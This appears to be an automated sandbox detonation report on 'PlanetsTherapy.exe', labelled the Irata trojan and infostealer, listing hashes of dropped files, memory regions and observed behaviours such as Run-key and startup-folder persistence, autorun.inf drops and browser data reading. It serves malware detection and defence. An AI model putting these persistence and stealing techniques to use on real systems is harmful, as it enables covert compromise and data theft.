SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sr.pak

MD5 c5ceff558e3015d4b7c7694c14cf0c1e
SHA1 37bb73f9239066730d2ebd16d9783b42cc126393
SHA256 16bb94cd02bb453343897efd1ee5fac3388aabe2691a755c801fab3276333ca5
SHA512 061fde1d1cbd1922f969dee18d22cae70b47c4e04335aa97be11058f3ad9f38b815ac9cf4c53e901f7ec60443052227ede0ed9c1716ac272ba730bb67a26c44d

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 49ff766f7a0798bba894ec54f54febfa
SHA1 b25945df8e86382a41ddb111393e0b2a3d59479d
SHA256 16d9a27a5d8b011769ec647ee8a628280ee4592a481527940fdfb542df964ab1
SHA512 bbfa4f053b48a9f9dc84d6496e4a79bacb6d4fe12475ed68b95a69157a01d1bf4874af8b771025f52280227c18d4313f07123317df218d982dbf98b862270410

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\elevate.exe

MD5 253304114ade9d744a63ada8c558469e
SHA1 4ccac3074b24fe12d75b906b7f748299b9364624
SHA256 da5d64db428a5e494634a012d715c654d34f0e60df70fbfe4052d007bfdddad0
SHA512 3c4ef191e3404d7b32d66848605992d7953d62a211af9169b45765eab3b8059f72702b7c51339cfb04620a16fddb3aa7ffc2265999feafd8b227edbe575167a4

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar

MD5 44350739db37b21f4e6ecfe95198620f
SHA1 20fade0d46a4f41ae9a7b25c37a67f1f0fd1bc8e
SHA256 02aae63bb88a5990c38c6bf9e33b9678010695c2984909c8723cc0cec2359a23
SHA512 92994be47626fded3c9022e4461bd4f760d38704ecda38d5760bbde4fc2b883bd619f3a09f31b3001133785203cd59a47161995cc9b47b874d78f4d406a8744e

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\swiftshader\libEGL.dll

MD5 b870728e95e1ff5d0fc07b71797d632d
SHA1 ab342eeed3820f2401a95fa35e2d095e49d3cf6e
SHA256 71724724b573a08e36ffc2c8955cd144a41e2c66e2fce0303bd470f83fe5f17d
SHA512 0718cfdbaabbdfa472d762aba2c182564c66c0b195534f5ab0b86f5b3915a9801db77edc673380f438dc8e839b9a64ea89b95886d4858002608067c3e9403049

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 d980b7ae3eee9966f223cdd7a7bd997a
SHA1 81aa0fe5df15ef0e9ad85cd0382ac8721a69edbd
SHA256 7def5c05bb7b6e4a77c5bdaae9a87a47fcc1918d2401b4d2d5ff4270743525c6
SHA512 f8ba422bf7d1fbc97dcc09a6f20ea20641ad01b81b1b9fda73171f925e57445abd0ed31fa743726033d842785fc890812fe32252f445c5978a4086277e977ea9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 b35ff2c5a0851fe6f727f082fad0332f
SHA1 99d5747764e461b00e7b00af040e2aff50ac983f
SHA256 e6710375a13e6a2059b9702cdda2debf986be02b719c4e8d15d9a37b0ae1dfa8
SHA512 83b093942e674f5947c3b559991ecb099785140a93decb99c488bbcf8b1fe823d837619305babb640ffd93e2db03e3b7e3b0c6967a3488c093fdaafa36c00b14

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 abe1db2be89263c8445ef234b80763b2
SHA1 3bab857d6953a05386105489b508c231a26360b1
SHA256 bc5ed5cddcc1b46f91545e082d0c5524c5690c6f81f0036ceabac4641635b343
SHA512 19780ad9936678bd720b0cd96e8dc8cd6357a9a32ab9d14ae2b6e9bebeb83a416d55990e2607629fa5213349c30a3e67a8fdc60a589c1ede4ad2a18e8f45f80f

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 f2319f395417a029048362c5c2c6a6f3
SHA1 1de79dc1650be70b845d56664eed0e59bd11aa72
SHA256 53a9901ccefd73cdd0ea1546ff22a148c222baa014e68be036060172af19cb0f
SHA512 24eb9778854946f86c4c3fcc19dfea74b717e283526be145cb9cdd254347077a120d6edd2877cc062e5d90fe4997f4c479cd744b08e88c96a547fe1cfaca5a34

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\v8_context_snapshot.bin

MD5 f23f00e69b533c7dd96cb2e40e0d94b1
SHA1 14b8364bc0e8ed68c266d9f76b0039bf2c0d1b7f
SHA256 1794161a9c3130ecf44f9a09020c8b25da03325220a2a7f3b7ec0e57ee70285c
SHA512 21a9f2b392f9ea2a41889b15810745bb5b2763c4913d22d06ce4ca60da3a598bacab307e033eb36a356f0ae7f2b3da604dbf2b706335a919dde3c1d2e85929cf

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\icudtl.dat

MD5 c096ef19da2ae1b940df0cd9b3bc2d0b
SHA1 3d729e463cd303309d453a5493485ef94fa1c98a
SHA256 bae82184fe87df6ea91597ea8511a45591aa98eaaa670afcf1a4c5e0944e493a
SHA512 10cfbcc2b8385cd6246df0b67cafc3bfd3920654be99e7baf0eb4539c54ce8bba3d9006ba1a562f7b55653408d144b4fdd2371e4f978257ce98dab44cd94d230

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 e2844a4b89f952a876cea765113318d8
SHA1 ba9fcb6b8d9076addc5ead9f578b7f7e03b6bda9
SHA256 ec0473c2927d6c93a55fa7c99083a53cae44ff0712860bc6e53de13eacc82f1b
SHA512 c08ddd5101557646d1fc448b41960afc14cccbe46f6b2ac4fa46fe0bc8e6e00071b9aef78e149e4f86887067f17095de0627a0ce868b2ae091eaa35b28da6a72

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar

MD5 cb3b8174449e5dd1ba402b2f6a133f40
SHA1 dce72d3337dab8e70a793a28133fa3efa7de1f3a
SHA256 2583e32805ea9f1761173579031bb97f624cd676562f699ab8221a59ebed371c
SHA512 0edf0a3ba6e713a0ebdfe35d753c89ea44a91d3e09fd6e0d0913308a5f87a2f8756e78a60f58dc2177a437d3893e881d048ba62cb97d2ba8f617faba56862597

\Users\Admin\AppData\Local\Temp\459ec94a-f1e2-4b2f-aa1a-81734d2c1651.tmp.node

MD5 fac7245a334780b514625f06f1a2e0d6
SHA1 bb8e0ed4742c3ccf98dbf838e0e320e211d9df9e
SHA256 d5e851f711b2bcc1f35c67804d1f16cbf5289c843623add67e08ab11559004fa
SHA512 84df6b072e70080861f4c8ef2e0b8601f6c969e9161b58cc9ce7db78cf01b80826f28dddaa357028fb49f314e966983f73da25fb62eee0b581aa123ee73c2dee

\Users\Admin\AppData\Local\Temp\27fea2d3-ffd0-4002-b77e-c2eba9c592a4.tmp.node

MD5 858895205a21048f118379efde8aeb25
SHA1 8db473c0cf61d86dd223829d061a3c5280d21990
SHA256 3874c83928754455b865a99e2ef864a07b3eadf4bd9671d0135cbe590f2d2e1c
SHA512 158863c332d87d876620bc098b2347bf6158ac8001699cde5ee99cb8ad7989040afca7acebbded6ce562df9f26f0fb2512a4a1b7b2b4436b2cbe36ea679b4424

memory/1140-580-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 778b3763bf5233c17cf6e66570438925
SHA1 286e49607e13a5a60991961f050b00ed63f304b5
SHA256 b1f7951d664a403ebf7b0fa96d15bec5ecf60572a2b16916106d091092e0d7b9
SHA512 e535d96a3d682b6a41d862d888c2c0e1d28fcf67a05bb665655c98ec53d28074a48f429317aab852f809e794a0a2deb74f8a8804d799456d78c77705a5deaa8e

memory/1140-614-0x0000000077B90000-0x0000000077B91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 db82d1d3b6fff58e33dea74a239acd5c
SHA1 7c6a506384130b5313feae49c46314cbcdd99019
SHA256 edca658b67bac2adf8f84eaa164d6e16e2cc498ed8913b1a1890cd677b48e8de
SHA512 00f0c686d353b1ced2b35b76e0cf1679e21b8cb0840df4b41a41a0c694f80a8435a8c48092f261f516e2da3e41d1118743e2ee0bae6486db326d56e3fc1d7c95

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 f14ef34d31b8f747757e16b93e93693c
SHA1 8f1b9e54e2869575e356aceac6ec5c985edd3ac2
SHA256 2fc1faa936171f1eec4780069f21256973344c72100295b3781bd4628d55c6de
SHA512 55bc3e14de8d2a113ebfbc31adad5597e91731d55e5dc556c7fbd9033c533873a14b5846f7b52938519887eae760478d42ec71b578b6afa2e7b06bb9582ec1d7

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources.pak

MD5 2510081e852309aef999ec200b5b8c00
SHA1 6a9478cbbcfd3c832bab2a543eb83749529b5a28
SHA256 eb4b779cd3a393f72886f7833b9d79f97981d7e450e0e50ec3245726ee13a730
SHA512 2ff867182f7893c278bf8bb569079c3774ddafbc8dafcc935defb7dbb19ca5d3a54f4d8c5c3d87f87a50f233dcaea647ed57232b30362dc024f27de831508d15

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\chrome_200_percent.pak

MD5 bdf56587924b2496354d56cfcdb15a16
SHA1 6b113ced998d15dd3d4d00ed573c1d6e327211b0
SHA256 47b966f8ec59460f4ffcfeedb7e36f20fd4ec89462c2a46f690fcaed7b48a6c0
SHA512 4c4626f6e290e34f96cf5c50defffb5b4f7ad56283fd5fc254ca71ad473231f95dc8dcc85b6d020af680211a9a9b18e65b119a9f97449e71aa53bd20c9f9be3b

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 02fab95be4c7a8fccee35670c4910361
SHA1 f6167456f0ed0d1a8035fd2caa43aa78bb70e0e0
SHA256 c3138c37ede4ee0a90a1a798cbf3bb0d4befa1e9f16e5efcb84684bfecb6aeb4
SHA512 7f58c91d999d13188f7554d9fa59feb93e62d133b8451fc098ad2bad0640f2b2065e3d16d884612ced8fd67edc16d752a5be67626cd2aff41990923f34fdd658

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\D3DCompiler_47.dll

MD5 79b70530c5d8dbe26c13a7342c28777d
SHA1 bf1843d93ce333322da6a4a77e71ab521c0c7b17
SHA256 68b6443b52ba9d00efba9925ca9919868b938cb9a48b7bd88f3d390eab9549ef
SHA512 3b41c904c051815dbde1968cb0e94526b0996d505989ab8d4cf285697fcdd7597f2b728e23c0adbc2d2a4a08dd80ecb4ddaa5eb6c12d7f5b2dc4c479305b5336

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libEGL.dll

MD5 817e5dc2d00f547bc455f26485c19b90
SHA1 ba41168be58bd71ecbc7a46874bf68591dc3f08a
SHA256 5882ce39d8804f7451825706d88afb55e8acc0060d748f21d9d71e93fd573a72
SHA512 a1bf8fa4debbb6f691a26811ce452c02221993b854835c8cf0bba96cb8ec6fca0c0499fbac696b7506ba26c0fdd1c16a07e628ef002932bf6d645658428749ec

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libegl.dll

MD5 6d907e2eb034fd4dea2fb227d107ef43
SHA1 1f6f3e189315848cdd8deb95150ca877feccf6a1
SHA256 3d0ced4053b03799bca1d018168032ff6bbe266c5561f45df6bbc7267feca4fc
SHA512 9a8d7ee4d9dbd0e15f821b5f1426ef64a01f2b51e75bf4f6da977376af1316bab91e2defdee086dfb108585d3fb842f06ae1189b8c430ea07f30bc15f4589cd6

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libGLESv2.dll

MD5 bd5a3e1026247b53273c206f7a9291d8
SHA1 f0fad95546812bb7ada3964ee4fd0c8d8e3ab256
SHA256 444f0d53a9dda061ccb0ce197234e04362a03b60f6712b484d7d688ed8f389cd
SHA512 76c30db64c4a9990d5b5cc34026bedab51c3a327ff36db5c3918efcf9c19d19e31d5c800124bf80d3895d24c05bba40a26b9ab313289ef6687933e83602139c9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libglesv2.dll

MD5 4113724e7344b1c9331c28e4ea153080
SHA1 9155e8b474779edbca62fc6e5758ac2f90c0912a
SHA256 bcfeb5ba907ab7cffd09644029f02e1ac065854b26e75a1f9ba02eb72607a019
SHA512 b31434a7dd43fa995bf8e723d6e836d9a07236520c9f214abcf500f2cd9b2c6393e60a7a2711e6c24f7698e99a8e92921e952517d410de60f837781f38cb20d2

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\d3dcompiler_47.dll

MD5 f738437b06d0b2c23ad33c91b782d259
SHA1 4bb9bb42d6d80b9412bdcf1fb2084b9314b6c358
SHA256 9b3d4fa1046483fe91d280294a30e3fa0ba11e2bd28b3f238e08f706086aa387
SHA512 0aee0ad4b58fe34f97b566f78ec6f75638df06c71d6872b64be2da6c010d23fd9daa7f2ce1e1103108a058b385d20d82a1888518473d1eee56946a6a6c783e20

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 e1eb691d47dc4572a3bdba1ba17c6153
SHA1 2e811de90545526cda3db9cc784a4c821cd71e98
SHA256 eebdacbfbfba67a9c300eaf86357639586fc736c1f95f8c30cf22aa4499de6a6
SHA512 652f96d3366953cc824552d50e5f730878dd242de51f5495052633de2981f0ebec5a8ec8057fca401e9839643ea7df9337ca5b39623167b7239ab74320d8c30c

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 46c8a363f08b8f5b5f7a671096cc93d2
SHA1 7325e5e2f271b4eae8b891981ec36400acc10752
SHA256 d5dd22e2c4f7a9c8c2f08939098e11651e63cdc9e92d6eec66a646de9cf4b6c4
SHA512 e9e2062ef30eb19d7310e07b9f34756ea3dcadbb6f9574654a338dae96662d497537765ef74c1a1add4986db12899adc0091b3220409ee8bed6aa88c1076c2c0

memory/2916-647-0x000000001B570000-0x000000001B852000-memory.dmp

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 e3beb528bc248f070c8540ddee39e03f
SHA1 2d7a21304b2c227662d5593926a398b9036a7ef5
SHA256 1101429d2c833eb4ffc03528d9ed3560f355baa0a3526926c30e5519d28d198c
SHA512 91e33b70c4cc294ff1a2dbdce0f045477abb90f9dfbea53096d2209ee2316820e88549bf0ea998d99993eb497b945a8b67db1565023ef5dd5a38c56aeb2dc1cf

memory/2916-656-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 7d61a53aa72ee55ba3cba206695213d1
SHA1 700f6aac3b89a505889202d68e99b99c2c92ad1f
SHA256 8b05aaf5f13c270309eed01bbfbe212edb48caf206199f676aee127adb9158ca
SHA512 7daec30450f23104ebf312079e34698e1507b545c4b88e2ce4b8ed381dde96749bad2bd51c2a99aea91c6f20220a45778a2e88746e979a06ddb509d3f869015a

memory/2916-662-0x000007FEF41F0000-0x000007FEF4B8D000-memory.dmp

memory/2916-666-0x000007FEF41F0000-0x000007FEF4B8D000-memory.dmp

memory/2916-668-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-670-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-674-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-664-0x0000000002BC0000-0x0000000002C40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 4b94eb73028571fc1ea9038d3f1a239a
SHA1 8ec575bd330a94446cc21e23d272f3e2c37f0153
SHA256 61a42a4cd024ba68776064ff0a6b9160c2801b6fff6d849df0acd04a33b61667
SHA512 e05f68778f3e1a2aaad366eb945c769467b6d433fa759a732f40fd6b913c4403c8b2c5b2ec84d0196e375c40a51bf090408ed868c13dce9cf0e0952a5446c08c

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vulkan-1.dll

MD5 247254b4a5240af6651251864a9a2fba
SHA1 d5815b3476845f9b69ad926cfd2b07d74e876dc9
SHA256 e8aeff191bede625f4f2c2bd774bcc73bafa32faa904c256770a9f1d91d136f7
SHA512 be4b7ef7fd0b28a2bd51d07eb5178548de6766757ce3e815858f0eb929697f7cb7158ec08ba4c981b813a72928f8a4b77f136e5ce24de13bb0d63e8bd1eacda9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vulkan-1.dll

MD5 581fb42c09b888550c4c846726f01f50
SHA1 0535567d457bd6b3d59a91dc28fd2bb226be5ce2
SHA256 a048f921cb5043e5d7c8a0eb1f390f0d5de554e76f0dbe72657b98181bfba50e
SHA512 a3e6f91227d127ba72cd80cb53b63fc277d94150d008cead5d33d395ea7a821342a5e3fee8eac416a85c10635dad2ed028adc544a34e0de036c88941f291ef73

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libEGL.dll

MD5 ba536a06b92a4900c4623dd1b82f1768
SHA1 3a791ba968eac9f82d86c4ba83ead24b5ff52613
SHA256 c3a66490202830eca95c7e2efa16c86bcb28fcb26182e69ab5c0df5360995d9e
SHA512 6ef341f8c32e2a84272c0deea529dcfc3f53da1611d3d837f7ff5a1d4d182ed27e1e0065fd800bb5055b851f396ecd7ab9503c816498e3ae8ad2a6d792dbcffd

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 2965ca33c7dec7782bd2a1c7b7db60b6
SHA1 c0f608e7c4bcf944ee36cc7c07e7fdb59f0f4d34
SHA256 d04fc459f71305126d1e9ef2db1ee48095e95f034a5a25db5120c2a078ea3ab9
SHA512 0b089003ecf962bb17e61b6af30f0f5426bbf3468e75f6b937c2acf23dea22fbf962dbb37bbc4c617287952e70655c096e4150ce48821def61fa0ea970899960

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libGLESv2.dll

MD5 a844a54670b39fe8599759262fbe63dd
SHA1 5d7ed3264aca73390511b6c1f2edfe3b2e1e50d7
SHA256 b6aa584b1e55fc0debe1dc42daa4cdb3eb834e2ad7fe7facd41c095a502843c2
SHA512 caf50dda8981f8a865f02a7cd59557787bfd7a81551376e87ade413f7c90c36210d88d61de9436f25f9ef521e4b928fb43bb617babe1b60bdc02f1ed834d2895

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\d3dcompiler_47.dll

MD5 8ae60f5fedcd76edf7c70754d34b499d
SHA1 2194b3119acc69004ec746eeb2d4deea70af8de0
SHA256 7aa69492c86b232010c0c4ba91db2977897b880d525b05d86c98a5e3efd9c51d
SHA512 581a47f5d285fa5baddc05a511c544741fc21e2a643f8b650f643b5a1f013ee3ac8b8c0746f937b629a200198f2b604725f0827c702545edd8785336747fb1ab

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 3f96b65bf3da35dac104a1010ca4d969
SHA1 a8261952fa2a536ee4807732223363f329013639
SHA256 5d170bccfeb76cc8f5e66bd1a6e1fbdfac4ccb93e3da5ac9021d87a9d8e9f40a
SHA512 a2da947ca8b1b4659056204bf285e40fea2a5d217bc45f49e823d020466414009c4a0f333b375c66d506b85c6b8484be26a5e086a72880c414eafd62215098d4

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 478067f3a84f963a0be02263d36ea852
SHA1 96b55581db74bf068404484f0695222990d49f42
SHA256 2d209e7d0da7556effad25ec845c7f5d77b104a5748af7ae0d55e09b4f8ef2fd
SHA512 1e7601d856e95c4a269960fd6835c11b6812b3085804595cba238ee7c3c92b9d17f3f5c05108f205c184bce8d370c3b849c94f599b9c91ca86922f3e6709d293

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 f5060483e6a21c89ca4a1d957fdb4062
SHA1 e5188fcffa2ffbf3849f44582757eea430e186a6
SHA256 0fab0c3f0e4cbff056b34d5cc9996188355c77ba4b38f3414d2b3d8cad0388f0
SHA512 00375d4dd983ab4a219bd3ffa000cd93b701a97a06116eecc6eb36ac74f1c13f93dc85a2cf1be11e149c2ae80fa538dab134890677aa87e2bc7d5c31b2cd8d92

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 5e863d0adc0204cc85e02d74ca3c65f6
SHA1 a3de8a02aa1db36d68983b0d739c82fcfd3ab169
SHA256 eb79d9224348ff2e27f02d76cbb167c4aee08f73fee9d309fe9cb4fd9bc318cd
SHA512 f9632f190295dd6d6dcbe611c747180de4336fe41c782d9785d9ae521e2ca8b49f24b64616413f4741b41eb2f84680421e973711956abdd5520b7aac9e213492

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 639ff5cc09a2ba402941b84789c13c23
SHA1 c8eb8ea4244b8407a207e3d1ae90744340a31703
SHA256 7efe4c1d830df4f2e372cdb3d10acc8d2cc9ce91896707542bf0f665bd998f14
SHA512 71ba9f30732d8b5057d3f4c2603d9281ccf71cdcffc76aa5436c1ad626b5166c581035ae1ae096e072f84f3fd7455a6d755c4a62264d3ad9a9bf29f3f64c8a6f

memory/2916-710-0x000007FEF41F0000-0x000007FEF4B8D000-memory.dmp

memory/2916-711-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-712-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-713-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-714-0x0000000002BC0000-0x0000000002C40000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-19 15:32

Reported

2023-12-19 15:37

Platform

win10v2004-20231215-en

Max time kernel

159s

Max time network

177s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupNBPdrq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\PlanetsTherapy.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_NBPdrq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_NBPdrq.vbs" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
